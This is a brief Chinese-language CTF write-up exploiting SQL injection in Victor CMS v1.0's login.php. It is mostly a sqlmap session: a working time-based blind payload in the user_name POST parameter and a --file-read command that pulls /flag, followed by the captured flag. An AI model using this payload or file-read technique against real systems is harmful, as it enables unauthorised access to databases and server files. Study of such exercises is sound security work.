Victor CMS v1.0 /includes/login.php 存在sql注入
找到页面的登录框,看介绍应该是post类型的表单注入。
上sqlmap用原本的梭发现ctf的那个表是空的,换用--file-read参数从目标中读取文件拿到flag。
root@Lockly temp/tmp » sqlmap -r sql.txt --file-read "/flag" --batch
___
__H__
___ ___["]_____ ___ ___ {1.7.9#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:08:44 /2023-09-22/
[15:08:44] [INFO] parsing HTTP request from 'sql.txt'
[15:08:46] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:08:46] [INFO] resuming back-end DBMS 'mysql'
[15:08:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_name=admin' AND (SELECT 4341 FROM (SELECT(SLEEP(5)))fdPd) AND 'Winx'='Winx&user_password=123455&login=
---
[15:08:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:08:47] [INFO] fingerprinting the back-end DBMS operating system
[15:08:51] [INFO] the back-end DBMS operating system is Linux
[15:08:51] [INFO] fetching file: '/flag'
[15:08:51] [INFO] retrieved:
[15:08:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6
[15:09:22] [INFO] adjusting time delay to 1 second due to good response times
66C61677B65613836376236362D353139332D346636642D623765302D6437643634386531643139647D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[15:16:02] [INFO] retrieved: 42
[15:16:10] [INFO] the local file '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag (same file)
[15:16:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com'
[*] ending @ 15:16:10 /2023-09-22/
root@Lockly temp/tmp » cat /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag
flag{ea867b66-5193-4f6d-b7e0-d7d648e1d19d}# root@Lockly temp/tmp »